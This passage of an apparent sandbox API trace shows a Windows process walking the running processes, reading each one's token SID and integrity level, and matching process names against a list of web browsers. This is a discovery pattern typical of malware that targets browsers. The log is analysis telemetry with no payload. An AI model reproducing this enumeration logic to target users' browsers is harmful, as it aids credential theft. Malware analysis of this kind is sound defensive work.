[0249.593] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0249.593] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0249.593] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xbc [0249.593] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.594] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.594] GetLastError () returned 0x7a [0249.594] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.594] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.594] CloseHandle (hObject=0x114) returned 1 [0249.594] CloseHandle (hObject=0xbc) returned 1 [0249.594] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.594] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.594] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.594] GetLastError () returned 0x7a [0249.594] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.594] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.594] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.594] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0249.594] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0249.594] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0249.594] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0249.594] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0249.594] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0249.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xbc [0249.594] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.594] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.594] GetLastError () returned 0x7a [0249.594] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.594] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.594] CloseHandle (hObject=0x114) returned 1 [0249.594] CloseHandle (hObject=0xbc) returned 1 [0249.594] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.594] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.594] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.594] GetLastError () returned 0x7a [0249.594] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.594] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.595] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.595] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0249.595] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0249.595] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0249.595] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0249.595] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0249.595] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0249.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0249.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0249.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xbc [0249.595] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.595] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.595] GetLastError () returned 0x7a [0249.595] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.595] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.595] CloseHandle (hObject=0x114) returned 1 [0249.595] CloseHandle (hObject=0xbc) returned 1 [0249.595] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.595] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.595] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.595] GetLastError () returned 0x7a [0249.595] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.595] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.595] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.595] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0249.595] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0249.595] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0249.595] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0249.595] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0249.595] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0249.595] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0xbc [0249.595] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.595] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.595] GetLastError () returned 0x7a [0249.595] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.596] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.596] CloseHandle (hObject=0x114) returned 1 [0249.596] CloseHandle (hObject=0xbc) returned 1 [0249.596] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.596] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.596] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.596] GetLastError () returned 0x7a [0249.596] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.596] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.596] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.596] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0249.596] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0249.596] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0249.596] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0249.596] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0249.596] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0249.596] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0xbc [0249.596] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.596] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.596] GetLastError () returned 0x7a [0249.596] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.596] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.596] CloseHandle (hObject=0x114) returned 1 [0249.596] CloseHandle (hObject=0xbc) returned 1 [0249.596] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.596] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.596] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.596] GetLastError () returned 0x7a [0249.596] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.596] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.596] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.596] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0249.596] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0249.597] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0249.597] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0249.597] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0249.597] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0249.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xbc [0249.597] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.597] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.597] GetLastError () returned 0x7a [0249.597] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.597] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.597] CloseHandle (hObject=0x114) returned 1 [0249.597] CloseHandle (hObject=0xbc) returned 1 [0249.597] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.597] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.597] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.597] GetLastError () returned 0x7a [0249.597] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.597] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.597] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.597] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0249.597] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0249.597] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0249.597] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0249.597] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0249.597] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0249.597] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0xbc [0249.597] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.597] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.597] GetLastError () returned 0x7a [0249.597] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.597] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.597] CloseHandle (hObject=0x114) returned 1 [0249.597] CloseHandle (hObject=0xbc) returned 1 [0249.597] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.598] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.598] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.598] GetLastError () returned 0x7a [0249.598] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.598] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.598] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.598] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0249.598] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0249.598] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0249.598] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0249.598] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0249.598] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0249.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0xbc [0249.598] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.598] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.598] GetLastError () returned 0x7a [0249.598] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.598] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.598] CloseHandle (hObject=0x114) returned 1 [0249.598] CloseHandle (hObject=0xbc) returned 1 [0249.598] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.598] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.598] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.598] GetLastError () returned 0x7a [0249.598] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.598] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.598] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.598] lstrcmpiW (lpString1="firefox.exe", lpString2="groups.exe") returned -1 [0249.598] lstrcmpiW (lpString1="chrome.exe", lpString2="groups.exe") returned -1 [0249.598] lstrcmpiW (lpString1="opera.exe", lpString2="groups.exe") returned 1 [0249.598] lstrcmpiW (lpString1="iexplore.exe", lpString2="groups.exe") returned 1 [0249.598] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="groups.exe") returned 1 [0249.598] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="groups.exe") returned 1 [0249.598] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xbc [0249.598] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0x114) returned 1 [0249.598] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0249.599] GetLastError () returned 0x7a [0249.599] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0249.599] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0249.599] CloseHandle (hObject=0x114) returned 1 [0249.599] CloseHandle (hObject=0xbc) returned 1 [0249.599] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0249.599] OpenProcessToken (in: ProcessHandle=0xbc, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0x114) returned 1 [0249.599] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0249.599] GetLastError () returned 0x7a [0249.599] GetTokenInformation (in: TokenHandle=0x114, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0249.599] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0249.599] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0249.599] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0249.599] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0249.599] lstrcmpiW (lpString1="opera.exe", 